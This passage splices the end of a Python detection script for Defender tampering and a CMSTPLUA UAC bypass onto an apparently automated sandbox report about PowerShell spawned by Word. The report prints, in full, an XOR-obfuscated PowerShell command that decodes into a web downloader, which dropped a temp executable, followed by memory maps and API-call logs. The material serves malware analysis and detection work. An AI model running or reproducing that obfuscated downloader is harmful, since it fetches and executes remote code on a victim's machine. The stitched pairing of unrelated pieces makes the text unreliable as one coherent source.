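        # 3. Defender tampering: service stop/delete, or real-time protection off.
        if DEFENDER_SVC.search(e.cmdline):
            findings.append(("defender_service_tamper", e.pid))
        if DEFENDER_RTP.search(e.cmdline):
            findings.append(("defender_realtime_disabled", e.pid))
        # 4. High-integrity child of the CMSTPLUA COM server whose RPC client was Medium.
        if (origin and origin.image == "dllhost.exe"
                and CMSTPLUA_CLSID in origin.cmdline.lower()
                and e.integrity.startswith("High")
                and by_pid.get(origin.origin_pid, origin).integrity.startswith("Medium")):
            findings.append(("uac_bypass_cmstplua", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE):
        print(f"{rule:28s} pid=0x{pid:x}")
```

On a real EDR feed the same rules apply to Sysmon Event ID 1 or Windows 4688 records; the integrity-level check in rule 4 is what separates a genuine elevated COM use from the bypass, because a legitimately elevated client would already be High.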
Process #2: powershell.exe
Information Value
ID #2
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'')
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:01:06, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:04:02
OS Process Information
Information Value
PID 0xa08
Parent PID 0x940 (c:\program files (x86)\microsoft office\office12\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xA0C
0xA20
0xA24
0xA28
0xA30
0xA34
0xA90
0xAA0
0xAA4
0xAA8
0xB3C
0xB48
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x00080000 0x00082fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False -
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001c0000 0x001c0000 0x001cffff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000240000 0x00240000 0x00240fff Pagefile Backed Memory Readable True False False -
private_0x0000000000250000 0x00250000 0x0025ffff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00260000 0x0027efff Memory Mapped File Readable True False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0030ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory - True False False -
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory - True False False -
private_0x0000000000350000 0x00350000 0x0035ffff Private Memory - True False False -
private_0x0000000000360000 0x00360000 0x0036ffff Private Memory - True False False -
private_0x0000000000370000 0x00370000 0x003affff Private Memory Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory - True False False -
private_0x0000000000400000 0x00400000 0x004fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000500000 0x00500000 0x00687fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000690000 0x00690000 0x00810fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000820000 0x00820000 0x01c1ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001c20000 0x01c20000 0x01cfefff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01d00000 0x01fcefff Memory Mapped File Readable False False False -
private_0x0000000001fd0000 0x01fd0000 0x01fdffff Private Memory - True False False -
private_0x0000000001fe0000 0x01fe0000 0x0201ffff Private Memory Readable, Writable True False False -
private_0x0000000002020000 0x02020000 0x0202ffff Private Memory Readable, Writable True False False -
l_intl.nls 0x02030000 0x02032fff Memory Mapped File Readable False False False -
private_0x0000000002040000 0x02040000 0x02040fff Private Memory Readable, Writable True False False -
sorttbls.nlp 0x02050000 0x02054fff Memory Mapped File Readable False False False -
microsoft.wsman.runtime.dll 0x02060000 0x02067fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000002070000 0x02070000 0x02070fff Pagefile Backed Memory Readable True False False -
private_0x0000000002080000 0x02080000 0x020bffff Private Memory Readable, Writable True False False -
private_0x00000000020c0000 0x020c0000 0x021bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021c0000 0x021c0000 0x025b2fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000025c0000 0x025c0000 0x025c0fff Pagefile Backed Memory Readable True False False -
private_0x00000000025d0000 0x025d0000 0x0260ffff Private Memory Readable, Writable True False False -
private_0x0000000002620000 0x02620000 0x0265ffff Private Memory Readable, Writable True False False -
private_0x00000000026a0000 0x026a0000 0x026dffff Private Memory Readable, Writable True False False -
sortkey.nlp 0x026e0000 0x02720fff Memory Mapped File Readable False False False -
private_0x0000000002740000 0x02740000 0x0277ffff Private Memory Readable, Writable True False False -
private_0x00000000027b0000 0x027b0000 0x027effff Private Memory Readable, Writable True False False -
private_0x00000000027f0000 0x027f0000 0x0288ffff Private Memory Readable, Writable True False False -
private_0x00000000028c0000 0x028c0000 0x028fffff Private Memory Readable, Writable True False False -
system.transactions.dll 0x02900000 0x02942fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000002990000 0x02990000 0x0299ffff Private Memory Readable, Writable True False False -
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable, Executable True False False -
private_0x00000000029f0000 0x029f0000 0x049effff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x049f0000 0x04aaffff Memory Mapped File Readable, Writable False False False -
private_0x0000000004ae0000 0x04ae0000 0x04b1ffff Private Memory Readable, Writable True False False -
system.management.automation.dll 0x04b20000 0x04e01fff Memory Mapped File Readable, Writable, Executable False False False -
powershell.exe 0x21c10000 0x21c81fff Memory Mapped File Readable, Writable, Executable False False False -
culture.dll 0x60340000 0x60347fff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.commands.management.ni.dll 0x6d7f0000 0x6d8b2fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.commands.utility.ni.dll 0x6d8c0000 0x6da5dfff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.ni.dll 0x6da60000 0x6dafbfff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.wsman.management.ni.dll 0x6db00000 0x6db84fff Memory Mapped File Readable, Writable, Executable True False False -
system.core.ni.dll 0x6db90000 0x6ddc4fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.ni.dll 0x6ddd0000 0x6e649fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.dll 0x6e650000 0x6e931fff Memory Mapped File Readable, Writable, Executable False False False -
system.ni.dll 0x6e940000 0x6f0dbfff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x6f0e0000 0x6fbd7fff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x6fbe0000 0x7018afff Memory Mapped File Readable, Writable, Executable True False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x70420000 0x7044dfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x74330000 0x7437bfff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x743d0000 0x744c4fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x74650000 0x746c9fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x746d0000 0x74719fff Memory Mapped File Readable, Writable, Executable True False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcr80.dll 0x74cb0000 0x74d4afff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
system.configuration.install.ni.dll 0x75170000 0x75194fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.commands.diagnostics.ni.dll 0x751a0000 0x751eafff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.consolehost.ni.dll 0x751f0000 0x75270fff Memory Mapped File Readable, Writable, Executable True False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x752b0000 0x752c3fff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x75330000 0x75339fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x75340000 0x7534afff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x75350000 0x75368fff Memory Mapped File Readable, Writable, Executable False False False -
ntshrui.dll 0x75370000 0x753dffff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x753e0000 0x753e8fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 89 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\280.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e, SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709, SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 False
c:\users\kft6utqw\appdata\local\temp\280.exe 104.00 KB MD5: bc1a4dc38f3236982d47496a1151f33f, SHA1: d112719238664d7996048614d75db8a67fc50fc5, SHA256: 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473 False
Threads
Thread 0xa0c
550 0
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 3
Fn
File Get Info filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Module Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe, size = 2048 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment Get Environment String name = MshEnableTrace False 3
Fn
File Get Info filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 9
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.config, type = file_attributes False 1
Fn
Environment Get Environment String name = MshEnableTrace False 6
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
System Get Info type = Operating System True 1
Fn
Environment Get Environment String name = MshEnableTrace False 9
Fn
Environment Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Environment True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Environment Set Environment String name = PSMODULEPATH, value = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ True 2
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 True 3
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
System Get Info type = Hardware Information True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 True 41
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ True 2
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 4
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 True 5
Fn
